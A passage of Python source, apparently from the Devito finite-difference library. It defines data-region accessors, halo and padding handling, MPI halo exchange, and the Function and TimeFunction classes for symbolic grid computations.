Shape of the domain region. The domain constitutes the area of the
data written to by an Operator.
Notes
-----
In an MPI context, this is the *local* domain region shape.
"""
return self._shape
@cached_property
def shape_domain(self):
"""
Shape of the domain region. The domain constitutes the area of the
data written to by an Operator.
Notes
-----
In an MPI context, this is the *local* domain region shape.
Alias to ``self.shape``.
"""
return self.shape
@cached_property
def shape_with_halo(self):
"""
Shape of the domain+outhalo region. The outhalo is the region
surrounding the domain that may be read by an Operator.
Notes
-----
In an MPI context, this is the *local* with_halo region shape.
Further, note that the outhalo of inner ranks is typically empty, while
the outhalo of boundary ranks contains a number of elements depending
on the rank position in the decomposed grid (corner, side, ...).
"""
return tuple(j + i + k for i, (j, k) in zip(self.shape, self._size_outhalo))
_shape_with_outhalo = shape_with_halo
@cached_property
def _shape_with_inhalo(self):
"""
Shape of the domain+inhalo region. The inhalo region comprises the
outhalo as well as any additional "ghost" layers for MPI halo
exchanges. Data in the inhalo region are exchanged when running
Operators to maintain consistent values as in sequential runs.
Notes
-----
Typically, this property won't be used in user code, but it may come
in handy for testing or debugging
"""
return tuple(j + i + k for i, (j, k) in zip(self.shape, self._halo))
@cached_property
def shape_allocated(self):
"""
Shape of the allocated data. It includes the domain and inhalo regions,
as well as any additional padding surrounding the halo.
Notes
-----
In an MPI context, this is the *local* with_halo region shape.
"""
return DimensionTuple(*[j + i + k for i, (j, k) in zip(self._shape_with_inhalo,
self._padding)],
getters=self.dimensions)
@cached_property
def shape_global(self):
"""
Global shape of the domain region. The domain constitutes the area of
the data written to by an Operator.
Notes
-----
In an MPI context, this is the *global* domain region shape, which is
therefore identical on all MPI ranks.
"""
if self.grid is None:
return self.shape
retval = []
for d, s in zip(self.dimensions, self.shape):
size = self.grid.dimension_map.get(d)
retval.append(size.glb if size is not None else s)
return tuple(retval)
@property
def size_global(self):
"""
The global number of elements this object is expected to store in memory.
Note that this would need to be combined with self.dtype to give the actual
size in bytes.
"""
return reduce(mul, self.shape_global)
_offset_inhalo = AbstractFunction._offset_halo
_size_inhalo = AbstractFunction._size_halo
@cached_property
def _size_outhalo(self):
"""Number of points in the outer halo region."""
if self._distributor is None:
# Computational domain is not distributed and hence the outhalo
# and inhalo correspond
return self._size_inhalo
left = [abs(min(i.loc_abs_min-i.glb_min-j, 0)) if i and not i.loc_empty else 0
for i, j in zip(self._decomposition, self._size_inhalo.left)]
right = [max(i.loc_abs_max+j-i.glb_max, 0) if i and not i.loc_empty else 0
for i, j in zip(self._decomposition, self._size_inhalo.right)]
sizes = tuple(Size(i, j) for i, j in zip(left, right))
if self._distributor.is_parallel and (any(left) > 0 or any(right)) > 0:
try:
warning_msg = """A space order of {0} and a halo size of {1} has been
set but the current rank ({2}) has a domain size of
only {3}""".format(self._space_order,
max(self._size_inhalo),
self._distributor.myrank,
min(self.grid.shape_local))
if not self._distributor.is_boundary_rank:
warning(warning_msg)
else:
left_dist = [i for i, d in zip(left, self.dimensions) if d
in self._distributor.dimensions]
right_dist = [i for i, d in zip(right, self.dimensions) if d
in self._distributor.dimensions]
for i, j, k, l in zip(left_dist, right_dist,
self._distributor.mycoords,
self._distributor.topology):
if l > 1 and ((j > 0 and k == 0) or (i > 0 and k == l-1)):
warning(warning_msg)
break
except AttributeError:
pass
return DimensionTuple(*sizes, getters=self.dimensions, left=left, right=right)
@property
def size_allocated(self):
"""
The number of elements this object is expected to store in memory.
Note that this would need to be combined with self.dtype to give the actual
size in bytes.
"""
return reduce(mul, self.shape_allocated)
@cached_property
def _mask_modulo(self):
"""Boolean mask telling which Dimensions support modulo-indexing."""
return tuple(True if i.is_Stepping else False for i in self.dimensions)
@cached_property
def _mask_domain(self):
"""Slice-based mask to access the domain region of the allocated data."""
return tuple(slice(i, j) for i, j in
zip(self._offset_domain, self._offset_halo.right))
@cached_property
def _mask_inhalo(self):
"""Slice-based mask to access the domain+inhalo region of the allocated data."""
return tuple(slice(i.left, i.right + j.right) for i, j in
zip(self._offset_inhalo, self._size_inhalo))
@cached_property
def _mask_outhalo(self):
"""Slice-based mask to access the domain+outhalo region of the allocated data."""
return tuple(slice(i.start - j.left, i.stop and i.stop + j.right or None)
for i, j in zip(self._mask_domain, self._size_outhalo))
@cached_property
def _decomposition(self):
"""
Tuple of Decomposition objects, representing the domain decomposition.
None is used as a placeholder for non-decomposed Dimensions.
"""
if self._distributor is None:
return (None,)*self.ndim
mapper = {d: self._distributor.decomposition[d] for d in self._dist_dimensions}
return tuple(mapper.get(d) for d in self.dimensions)
@cached_property
def _decomposition_outhalo(self):
"""
Tuple of Decomposition objects, representing the domain+outhalo
decomposition. None is used as a placeholder for non-decomposed Dimensions.
"""
if self._distributor is None:
return (None,)*self.ndim
return tuple(v.reshape(*self._size_inhalo[d]) if v is not None else v
for d, v in zip(self.dimensions, self._decomposition))
@property
def data(self):
"""
The domain data values, as a numpy.ndarray.
Elements are stored in row-major format.
Notes
-----
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use :meth:`data_ro`
instead.
"""
return self.data_domain
def data_gather(self, start=None, stop=None, step=1, rank=0):
"""
Gather distributed `Data` attached to a `Function` onto a single rank.
Parameters
----------
rank : int
The rank onto which the data will be gathered.
step : int or tuple of ints
The `slice` step in each dimension.
start : int or tuple of ints
The `slice` start in each dimension.
stop : int or tuple of ints
The final point of the `slice` to include.
Notes
-----
Alias to ``self.data._gather``.
Note that gathering data from large simulations onto a single rank may
result in memory blow-up and hence should use this method judiciously.
"""
return self.data._gather(start=start, stop=stop, step=step, rank=rank)
@property
@_allocate_memory
def data_domain(self):
"""
The domain data values.
Elements are stored in row-major format.
Notes
-----
Alias to ``self.data``.
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use
:meth:`data_ro_domain` instead.
"""
self._is_halo_dirty = True
return self._data._global(self._mask_domain, self._decomposition)
@property
@_allocate_memory
def data_with_halo(self):
"""
The domain+outhalo data values.
Elements are stored in row-major format.
Notes
-----
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use
:meth:`data_ro_with_halo` instead.
"""
self._is_halo_dirty = True
self._halo_exchange()
return self._data._global(self._mask_outhalo, self._decomposition_outhalo)
_data_with_outhalo = data_with_halo
@property
@_allocate_memory
def _data_with_inhalo(self):
"""
The domain+inhalo data values.
Elements are stored in row-major format.
Notes
-----
This accessor does *not* support global indexing.
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use
:meth:`data_ro_with_inhalo` instead.
Typically, this accessor won't be used in user code to set or read data
values. Instead, it may come in handy for testing or debugging
"""
self._is_halo_dirty = True
self._halo_exchange()
return np.asarray(self._data[self._mask_inhalo])
@property
@_allocate_memory
def _data_allocated(self):
"""
The allocated data values, that is domain+inhalo+padding.
Elements are stored in row-major format.
Notes
-----
This accessor does *not* support global indexing.
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use
:meth:`data_ro_allocated` instead.
Typically, this accessor won't be used in user code to set or read data
values. Instead, it may come in handy for testing or debugging
"""
self._is_halo_dirty = True
self._halo_exchange()
return np.asarray(self._data)
def _data_in_region(self, region, dim, side):
"""
The data values in a given region.
Parameters
----------
region : DataRegion
The data region of interest (e.g., OWNED, HALO) for which a view
is produced.
dim : Dimension
The dimension of interest.
side : DataSide
The side of interest (LEFT, RIGHT).
Notes
-----
This accessor does *not* support global indexing.
With this accessor you are claiming that you will modify the values you
get back.
Typically, this accessor won't be used in user code to set or read
data values.
"""
self._is_halo_dirty = True
offset = getattr(getattr(self, '_offset_%s' % region.name)[dim], side.name)
size = getattr(getattr(self, '_size_%s' % region.name)[dim], side.name)
index_array = [
slice(offset, offset+size) if d is dim else slice(pl, s - pr)
for d, s, (pl, pr)
in zip(self.dimensions, self.shape_allocated, self._padding)
]
return np.asarray(self._data[index_array])
@property
@_allocate_memory
def data_ro_domain(self):
"""Read-only view of the domain data values."""
view = self._data._global(self._mask_domain, self._decomposition)
view.setflags(write=False)
return view
@property
@_allocate_memory
def data_ro_with_halo(self):
"""Read-only view of the domain+outhalo data values."""
view = self._data._global(self._mask_outhalo, self._decomposition_outhalo)
view.setflags(write=False)
return view
_data_ro_with_outhalo = data_ro_with_halo
@property
@_allocate_memory
def _data_ro_with_inhalo(self):
"""
Read-only view of the domain+inhalo data values.
Notes
-----
This accessor does *not* support global indexing.
"""
view = self._data[self._mask_inhalo]
view.setflags(write=False)
return np.asarray(view)
@property
@_allocate_memory
def _data_ro_allocated(self):
"""
Read-only view of the domain+inhalo+padding data values.
Notes
-----
This accessor does *not* support global indexing.
"""
view = self._data
view.setflags(write=False)
return np.asarray(view)
@cached_property
def local_indices(self):
"""
Tuple of slices representing the global indices that logically
belong to the calling MPI rank.
Notes
-----
Given a Function ``f(x, y)`` with shape ``(nx, ny)``, when *not* using
MPI this property will return ``(slice(0, nx-1), slice(0, ny-1))``. On
the other hand, when MPI is used, the local ranges depend on the domain
decomposition, which is carried by ``self.grid``.
"""
if self._distributor is None:
return tuple(slice(0, s) for s in self.shape)
else:
return tuple(self._distributor.glb_slices.get(d, slice(0, s))
for s, d in zip(self.shape, self.dimensions))
@cached_property
def space_dimensions(self):
"""Tuple of Dimensions defining the physical space."""
return tuple(d for d in self.dimensions if d.is_Space)
@cached_property
def _dist_dimensions(self):
"""Tuple of MPI-distributed Dimensions."""
if self._distributor is None:
return ()
return tuple(d for d in self.dimensions if d in self._distributor.dimensions)
@property
def initializer(self):
if self._data is not None:
return self.data_with_halo.view(np.ndarray)
else:
return self._initializer
_C_structname = 'dataobj'
_C_typename = 'struct %s *' % _C_structname
_C_field_data = 'data'
_C_field_size = 'size'
_C_field_nopad_size = 'npsize'
_C_field_domain_size = 'dsize'
_C_field_halo_size = 'hsize'
_C_field_halo_ofs = 'hofs'
_C_field_owned_ofs = 'oofs'
_C_typedecl = Struct(_C_structname,
[Value('%srestrict' % ctypes_to_cstr(c_void_p), _C_field_data),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_nopad_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_domain_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_halo_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_halo_ofs),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_owned_ofs)])
_C_ctype = POINTER(type(_C_structname, (Structure,),
{'_fields_': [(_C_field_data, c_void_p),
(_C_field_size, POINTER(c_int)),
(_C_field_nopad_size, POINTER(c_int)),
(_C_field_domain_size, POINTER(c_int)),
(_C_field_halo_size, POINTER(c_int)),
(_C_field_halo_ofs, POINTER(c_int)),
(_C_field_owned_ofs, POINTER(c_int))]}))
def _C_make_dataobj(self, data):
"""
A ctypes object representing the DiscreteFunction that can be passed to
an Operator.
"""
dataobj = byref(self._C_ctype._type_())
dataobj._obj.data = data.ctypes.data_as(c_void_p)
dataobj._obj.size = (c_int*self.ndim)(*data.shape)
# MPI-related fields
dataobj._obj.npsize = (c_int*self.ndim)(*[i - sum(j) for i, j in
zip(data.shape, self._size_padding)])
dataobj._obj.dsize = (c_int*self.ndim)(*self._size_domain)
dataobj._obj.hsize = (c_int*(self.ndim*2))(*flatten(self._size_halo))
dataobj._obj.hofs = (c_int*(self.ndim*2))(*flatten(self._offset_halo))
dataobj._obj.oofs = (c_int*(self.ndim*2))(*flatten(self._offset_owned))
# stash a reference to the array on _obj, so we don't let it get freed
# while we hold onto _obj
dataobj._obj.underlying_array = data
return dataobj
def _C_as_ndarray(self, dataobj):
"""Cast the data carried by a DiscreteFunction dataobj to an ndarray."""
shape = tuple(dataobj._obj.size[i] for i in range(self.ndim))
ctype_1d = dtype_to_ctype(self.dtype) * int(reduce(mul, shape))
buf = cast(dataobj._obj.data, POINTER(ctype_1d)).contents
return np.frombuffer(buf, dtype=self.dtype).reshape(shape)
@memoized_meth
def _C_make_index(self, dim, side=None):
# Depends on how fields are populated in `_C_make_dataobj`
idx = self.dimensions.index(dim)
if side is not None:
idx = idx*2 + (0 if side is LEFT else 1)
return idx
@memoized_meth
def _C_get_field(self, region, dim, side=None):
"""Symbolic representation of a given data region."""
ffp = lambda f, i: FieldFromPointer("%s[%d]" % (f, i), self._C_symbol)
if region is DOMAIN:
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_domain_size, self._C_make_index(dim))
elif region is OWNED:
if side is LEFT:
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_halo_size, self._C_make_index(dim, RIGHT))
elif side is CENTER:
# Note: identical to region=HALO, side=CENTER
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_domain_size, self._C_make_index(dim))
else:
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, RIGHT))
size = ffp(self._C_field_halo_size, self._C_make_index(dim, LEFT))
elif region is HALO:
if side is LEFT:
offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_halo_size, self._C_make_index(dim, LEFT))
elif side is CENTER:
# Note: identical to region=OWNED, side=CENTER
offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_domain_size, self._C_make_index(dim))
else:
offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, RIGHT))
size = ffp(self._C_field_halo_size, self._C_make_index(dim, RIGHT))
elif region is NOPAD:
offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, LEFT))
size = ffp(self._C_field_nopad_size, self._C_make_index(dim))
elif region is FULL:
offset = 0
size = ffp(self._C_field_size, self._C_make_index(dim))
else:
raise ValueError("Unknown region `%s`" % str(region))
return RegionMeta(offset, size)
def _halo_exchange(self):
"""Perform the halo exchange with the neighboring processes."""
if not MPI.Is_initialized() or MPI.COMM_WORLD.size == 1:
# Nothing to do
return
if MPI.COMM_WORLD.size > 1 and self._distributor is None:
raise RuntimeError("`%s` cannot perform a halo exchange as it has "
"no Grid attached" % self.name)
neighborhood = self._distributor.neighborhood
comm = self._distributor.comm
for d in self._dist_dimensions:
for i in [LEFT, RIGHT]:
# Get involved peers
dest = neighborhood[d][i]
source = neighborhood[d][i.flip()]
# Gather send data
data = self._data_in_region(OWNED, d, i)
sendbuf = np.ascontiguousarray(data)
# Setup recv buffer
shape = self._data_in_region(HALO, d, i.flip()).shape
recvbuf = np.ndarray(shape=shape, dtype=self.dtype)
# Communication
comm.Sendrecv(sendbuf, dest=dest, recvbuf=recvbuf, source=source)
# Scatter received data
if recvbuf is not None and source != MPI.PROC_NULL:
self._data_in_region(HALO, d, i.flip())[:] = recvbuf
self._is_halo_dirty = False
@property
def _arg_names(self):
"""Tuple of argument names introduced by this function."""
return (self.name,)
def _arg_defaults(self, alias=None):
"""
A map of default argument values defined by this symbol.
Parameters
----------
alias : DiscreteFunction, optional
To bind the argument values to different names.
"""
key = alias or self
args = ReducerMap({key.name: self._data_buffer})
# Collect default dimension arguments from all indices
for i, s in zip(key.dimensions, self.shape):
args.update(i._arg_defaults(_min=0, size=s))
return args
def _arg_values(self, **kwargs):
"""
A map of argument values after evaluating user input. If no
user input is provided, return a default value.
Parameters
----------
**kwargs
Dictionary of user-provided argument overrides.
"""
# Add value override for own data if it is provided, otherwise
# use defaults
if self.name in kwargs:
new = kwargs.pop(self.name)
if isinstance(new, DiscreteFunction):
# Set new values and re-derive defaults
values = new._arg_defaults(alias=self).reduce_all()
else:
# We've been provided a pure-data replacement (array)
values = {self.name: new}
# Add value overrides for all associated dimensions
for i, s in zip(self.dimensions, new.shape):
size = s - sum(self._size_nodomain[i])
values.update(i._arg_defaults(size=size))
else:
values = self._arg_defaults(alias=self).reduce_all()
return values
def _arg_check(self, args, intervals):
"""
Check that ``args`` contains legal runtime values bound to ``self``.
Raises
------
InvalidArgument
If, given the runtime values ``args``, an out-of-bounds array
access would be performed, or if shape/dtype don't match with
self's shape/dtype.
"""
if self.name not in args:
raise InvalidArgument("No runtime value for `%s`" % self.name)
key = args[self.name]
if len(key.shape) != self.ndim:
raise InvalidArgument("Shape %s of runtime value `%s` does not match "
"dimensions %s" %
(key.shape, self.name, self.dimensions))
if key.dtype != self.dtype:
warning("Data type %s of runtime value `%s` does not match the "
"Function data type %s" % (key.dtype, self.name, self.dtype))
for i, s in zip(self.dimensions, key.shape):
i._arg_check(args, s, intervals[i])
def _arg_finalize(self, args, alias=None):
key = alias or self
return {key.name: self._C_make_dataobj(args[key.name])}
# Pickling support
_pickle_kwargs = AbstractFunction._pickle_kwargs +\
['grid', 'staggered', 'initializer']
class Function(DiscreteFunction):
"""
Tensor symbol representing a discrete function in symbolic equations.
A Function carries multi-dimensional data and provides operations to create
finite-differences approximations.
A Function encapsulates space-varying data; for data that also varies in time,
use TimeFunction instead.
Parameters
----------
name : str
Name of the symbol.
grid : Grid, optional
Carries shape, dimensions, and dtype of the Function. When grid is not
provided, shape and dimensions must be given. For MPI execution, a
Grid is compulsory.
space_order : int or 3-tuple of ints, optional
Discretisation order for space derivatives. Defaults to 1. ``space_order`` also
impacts the number of points available around a generic point of interest. By
default, ``space_order`` points are available on both sides of a generic point of
interest, including those nearby the grid boundary. Sometimes, fewer points
suffice; in other scenarios, more points are necessary. In such cases, instead of
an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization
order (``o``) as well as the number of points on the left (``lp``) and right
(``rp``) sides of a generic point of interest.
shape : tuple of ints, optional
Shape of the domain region in grid points. Only necessary if ``grid`` isn't given.
dimensions : tuple of Dimension, optional
Dimensions associated with the object. Only necessary if ``grid`` isn't given.
dtype : data-type, optional
Any object that can be interpreted as a numpy data type. Defaults
to ``np.float32``.
staggered : Dimension or tuple of Dimension or Stagger, optional
Define how the Function is staggered.
initializer : callable or any object exposing the buffer interface, optional
Data initializer. If a callable is provided, data is allocated lazily.
allocator : MemoryAllocator, optional
Controller for memory allocation. To be used, for example, when one wants
to take advantage of the memory hierarchy in a NUMA architecture. Refer to
`default_allocator.__doc__` for more information.
padding : int or tuple of ints, optional
.. deprecated:: shouldn't be used; padding is now automatically inserted.
Allocate extra grid points to maximize data access alignment. When a tuple
of ints, one int per Dimension should be provided.
Examples
--------
Creation
>>> from devito import Grid, Function
>>> grid = Grid(shape=(4, 4))
>>> f = Function(name='f', grid=grid)
>>> f
f(x, y)
>>> g = Function(name='g', grid=grid, space_order=2)
>>> g
g(x, y)
First-order derivatives through centered finite-difference approximations
>>> f.dx
Derivative(f(x, y), x)
>>> f.dy
Derivative(f(x, y), y)
>>> g.dx
Derivative(g(x, y), x)
>>> (f + g).dx
Derivative(f(x, y) + g(x, y), x)
First-order derivatives through left/right finite-difference approximations
>>> f.dxl
Derivative(f(x, y), x)
Note that the fact that it's a left-derivative isn't captured in the representation.
However, upon derivative expansion, this becomes clear
>>> f.dxl.evaluate
f(x, y)/h_x - f(x - h_x, y)/h_x
>>> f.dxr
Derivative(f(x, y), x)
Second-order derivative through centered finite-difference approximation
>>> g.dx2
Derivative(g(x, y), (x, 2))
Notes
-----
The parameters must always be given as keyword arguments, since SymPy
uses ``*args`` to (re-)create the dimension arguments of the symbolic object.
"""
is_Function = True
def _cache_meta(self):
# Attach additional metadata to self's cache entry
return {'nbytes': self.size}
def __init_finalize__(self, *args, **kwargs):
super(Function, self).__init_finalize__(*args, **kwargs)
# Space order
space_order = kwargs.get('space_order', 1)
if isinstance(space_order, int):
self._space_order = space_order
elif isinstance(space_order, tuple) and len(space_order) == 3:
self._space_order, _, _ = space_order
else:
raise TypeError("`space_order` must be int or 3-tuple of ints")
self._fd = self.__fd_setup__()
# Flag whether it is a parameter or a variable.
# Used at operator evaluation to evaluate the Function at the
# variable location (i.e. if the variable is staggered in x the
# parameter has to be computed at x + hx/2)
self._is_parameter = kwargs.get('parameter', False)
def __fd_setup__(self):
"""
Dynamically add derivative short-cuts.
"""
return generate_fd_shortcuts(self.dimensions, self.space_order)
@cached_property
def _fd_priority(self):
return 1 if self.staggered in [NODE, None] else 2
@property
def is_parameter(self):
return self._is_parameter
def _eval_at(self, func):
if not self.is_parameter or self.staggered == func.staggered:
return self
mapper = {self.indices_ref[d]: func.indices_ref[d]
for d in self.dimensions
if self.indices_ref[d] is not func.indices_ref[d]}
if mapper:
return self.subs(mapper)
return self
@classmethod
def __indices_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dimensions = kwargs.get('dimensions')
if grid is None:
if dimensions is None:
raise TypeError("Need either `grid` or `dimensions`")
elif dimensions is None:
dimensions = grid.dimensions
# Staggered indices
staggered = kwargs.get("staggered", None)
if staggered in [CELL, NODE]:
staggered_indices = dimensions
else:
mapper = {d: d for d in dimensions}
for s in as_tuple(staggered):
c, s = s.as_coeff_Mul()
mapper.update({s: s + c * s.spacing/2})
staggered_indices = mapper.values()
return tuple(dimensions), tuple(staggered_indices)
@property
def is_Staggered(self):
return self.staggered is not None
@classmethod
def __shape_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dimensions = kwargs.get('dimensions')
shape = kwargs.get('shape', kwargs.get('shape_global'))
if grid is None:
if shape is None:
raise TypeError("Need either `grid` or `shape`")
elif shape is None:
if dimensions is not None and dimensions != grid.dimensions:
raise TypeError("Need `shape` as not all `dimensions` are in `grid`")
shape = grid.shape_local
elif dimensions is None:
raise TypeError("`dimensions` required if both `grid` and "
"`shape` are provided")
else:
# Got `grid`, `dimensions`, and `shape`. We sanity-check that the
# Dimensions in `dimensions` also appearing in `grid` have same size
# (given by `shape`) as that provided in `grid`
if len(shape) != len(dimensions):
raise ValueError("`shape` and `dimensions` must have the "
"same number of entries")
loc_shape = []
for d, s in zip(dimensions, shape):
if d in grid.dimensions:
size = grid.dimension_map[d]
if size.glb != s and s is not None:
raise ValueError("Dimension `%s` is given size `%d`, "
"while `grid` says `%s` has size `%d` "
% (d, s, d, size.glb))
else:
loc_shape.append(size.loc)
else:
loc_shape.append(s)
shape = tuple(loc_shape)
return shape
def __halo_setup__(self, **kwargs):
halo = kwargs.get('halo')
if halo is not None:
return halo
else:
space_order = kwargs.get('space_order', 1)
if isinstance(space_order, int):
halo = (space_order, space_order)
elif isinstance(space_order, tuple) and len(space_order) == 3:
_, left_points, right_points = space_order
halo = (left_points, right_points)
else:
raise TypeError("`space_order` must be int or 3-tuple of ints")
return tuple(halo if i.is_Space else (0, 0) for i in self.dimensions)
def __padding_setup__(self, **kwargs):
padding = kwargs.get('padding')
if padding is None:
if kwargs.get('autopadding', configuration['autopadding']):
# Auto-padding
# 0-padding in all Dimensions except in the Fastest Varying Dimension,
# `fvd`, which is the innermost one
padding = [(0, 0) for i in self.dimensions[:-1]]
fvd = self.dimensions[-1]
# Let UB be a function that rounds up a value `x` to the nearest
# multiple of the SIMD vector length, `vl`
vl = configuration['platform'].simd_items_per_reg(self.dtype)
ub = lambda x: int(ceil(x / vl)) * vl
# Given the HALO and DOMAIN sizes, the right-PADDING is such that:
# * the `fvd` size is a multiple of `vl`
# * it contains *at least* `vl` points
# This way:
# * all first grid points along the `fvd` will be cache-aligned
# * there is enough room to round up the loop trip counts to maximize
# the effectiveness SIMD vectorization
fvd_pad_size = (ub(self._size_nopad[fvd]) - self._size_nopad[fvd]) + vl
padding.append((0, fvd_pad_size))
return tuple(padding)
else:
return tuple((0, 0) for d in self.dimensions)
elif isinstance(padding, int):
return tuple((0, padding) if d.is_Space else (0, 0) for d in self.dimensions)
elif isinstance(padding, tuple) and len(padding) == self.ndim:
return tuple((0, i) if isinstance(i, int) else i for i in padding)
else:
raise TypeError("`padding` must be int or %d-tuple of ints" % self.ndim)
@property
def space_order(self):
"""The space order."""
return self._space_order
def sum(self, p=None, dims=None):
"""
Generate a symbolic expression computing the sum of ``p`` points
along the spatial dimensions ``dims``.
Parameters
----------
p : int, optional
The number of summands. Defaults to the halo size.
dims : tuple of Dimension, optional
The Dimensions along which the sum is computed. Defaults to
``self``'s spatial dimensions.
"""
points = []
for d in (as_tuple(dims) or self.space_dimensions):
if p is None:
lp = self._size_inhalo[d].left
rp = self._size_inhalo[d].right
else:
lp = p // 2 + p % 2
rp = p // 2
indices = [d - i for i in range(lp, 0, -1)]
indices.extend([d + i for i in range(rp)])
points.extend([self.subs({d: i}) for i in indices])
return sum(points)
def avg(self, p=None, dims=None):
"""
Generate a symbolic expression computing the average of ``p`` points
along the spatial dimensions ``dims``.
Parameters
----------
p : int, optional
The number of summands. Defaults to the halo size.
dims : tuple of Dimension, optional
The Dimensions along which the average is computed. Defaults to
``self``'s spatial dimensions.
"""
tot = self.sum(p, dims)
return tot / len(tot.args)
# Pickling support
_pickle_kwargs = DiscreteFunction._pickle_kwargs +\
['space_order', 'shape_global', 'dimensions']
class TimeFunction(Function):
"""
Tensor symbol representing a discrete function in symbolic equations.
A TimeFunction carries multi-dimensional data and provides operations to create
finite-differences approximations, in both space and time.
A TimeFunction encapsulates space- and time-varying data.
Parameters
----------
name : str
Name of the symbol.
grid : Grid, optional
Carries shape, dimensions, and dtype of the Function. When grid is not
provided, shape and dimensions must be given. For MPI execution, a
Grid is compulsory.
space_order : int or 3-tuple of ints, optional
Discretisation order for space derivatives. Defaults to 1. ``space_order`` also
impacts the number of points available around a generic point of interest. By
default, ``space_order`` points are available on both sides of a generic point of
interest, including those nearby the grid boundary. Sometimes, fewer points
suffice; in other scenarios, more points are necessary. In such cases, instead of
an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization
order (``o``) as well as the number of points on the left (``lp``) and right
(``rp``) sides of a generic point of interest.
time_order : int, optional
Discretization order for time derivatives. Defaults to 1.
shape : tuple of ints, optional
Shape of the domain region in grid points. Only necessary if `grid` isn't given.
dimensions : tuple of Dimension, optional
Dimensions associated with the object. Only necessary if `grid` isn't given.
dtype : data-type, optional
Any object that can be interpreted as a numpy data type. Defaults
to `np.float32`.
save : int or Buffer, optional
By default, ``save=None``, which indicates the use of alternating buffers. This
enables cyclic writes to the TimeFunction. For example, if the TimeFunction
``u(t, x)`` has shape (3, 100), then, in an Operator, ``t`` will assume the
values ``1, 2, 0, 1, 2, 0, 1, ...`` (note that the very first value depends
on the stencil equation in which ``u`` is written.). The default size of the time
buffer when ``save=None`` is ``time_order + 1``. To specify a different size for
the time buffer, one should use the syntax ``save=Buffer(mysize)``.
Alternatively, if all of the intermediate results are required (or, simply, to
avoid using an alternating buffer), an explicit value for ``save`` ( an integer)
must be provided.
time_dim : Dimension, optional
TimeDimension to be used in the TimeFunction. Defaults to ``grid.time_dim``.
staggered : Dimension or tuple of Dimension or Stagger, optional
Define how the Function is staggered.
initializer : callable or any object exposing the buffer interface, optional
Data initializer. If a callable is provided, data is allocated lazily.
allocator : MemoryAllocator, optional
Controller for memory allocation. To be used, for example, when one wants
to take advantage of the memory hierarchy in a NUMA architecture. Refer to
`default_allocator.__doc__` for more information.
padding : int or tuple of ints, optional
.. deprecated:: shouldn't be used; padding is now automatically inserted.
Allocate extra grid points to maximize data access alignment. When a tuple
of ints, one int per Dimension should be provided.
Examples
--------
Creation
>>> from devito import Grid, TimeFunction
>>> grid = Grid(shape=(4, 4))
>>> f = TimeFunction(name='f', grid=grid)
>>> f
f(t, x, y)
>>> g = TimeFunction(name='g', grid=grid, time_order=2)
>>> g
g(t, x, y)
First-order derivatives through centered finite-difference approximations
>>> f.dx
Derivative(f(t, x, y), x)
>>> f.dt
Derivative(f(t, x, y), t)
>>> g.dt
Derivative(g(t, x, y), t)
When using the alternating buffer protocol, the size of the time dimension
is given by ``time_order + 1``
>>> f.shape
(2, 4, 4)
>>> g.shape
(3, 4, 4)
One can drop the alternating buffer protocol specifying a value for ``save``
>>> h = TimeFunction(name='h', grid=grid, save=20)
>>> h
h(time, x, y)
>>> h.shape
(20, 4, 4)
Notes
-----
The parameters must always be given as keyword arguments, since SymPy uses
``*args`` to (re-)create the dimension arguments of the symbolic object.
If the parameter ``grid`` is provided, the values for ``shape``,
``dimensions`` and ``dtype`` will be derived from it. When present, the
parameter ``shape`` should only define the spatial shape of the grid. The
temporal dimension will be inserted automatically as the leading dimension.
"""
is_TimeFunction = True
is_TimeDependent = True
_time_position = 0
"""Position of time index among the function indices."""
def __init_finalize__(self, *args, **kwargs):
self.time_dim = kwargs.get('time_dim', self.dimensions[self._time_position])
self._time_order = kwargs.get('time_order', 1)
super(TimeFunction, self).__init_finalize__(*args, **kwargs)
# Check we won't allocate too much memory for the system
available_mem = virtual_memory().available
if np.dtype(self.dtype).itemsize * self.size > available_mem:
warning("Trying to allocate more memory for symbol %s " % self.name +
"than available on physical device, this will start swapping")
if not isinstance(self.time_order, int):
raise TypeError("`time_order` must be int")
self.save = kwargs.get('save')
def __fd_setup__(self):
"""
Dynamically add derivative short-cuts.
"""
return generate_fd_shortcuts(self.dimensions, self.space_order,
to=self.time_order)
@classmethod
def __indices_setup__(cls, **kwargs):
dimensions = kwargs.get('dimensions')
staggered = kwargs.get('staggered')
if dimensions is None:
save = kwargs.get('save')
grid = kwargs.get('grid')
time_dim = kwargs.get('time_dim')
if time_dim is None:
time_dim = grid.time_dim if isinstance(save, int) else grid.stepping_dim
elif not (isinstance(time_dim, Dimension) and time_dim.is_Time):
raise TypeError("`time_dim` must be a time dimension")
dimensions = list(Function.__indices_setup__(**kwargs)[0])
dimensions.insert(cls._time_position, time_dim)
return Function.__indices_setup__(dimensions=dimensions, staggered=staggered)
@classmethod
def __shape_setup__(cls, **kwargs):
grid = kwargs.get('grid')
save = kwargs.get('save') or None # Force to None if 0/False/None/...
dimensions = kwargs.get('dimensions')
shape = kwargs.get('shape', kwargs.get('shape_global'))
time_order = kwargs.get('time_order', 1)
if grid is None:
if shape is None:
raise TypeError("Need either `grid` or `shape`")
if save is not None:
raise TypeError("Ambiguity detected: provide either `grid` and `save` "
"or just `shape` ")
elif shape is None:
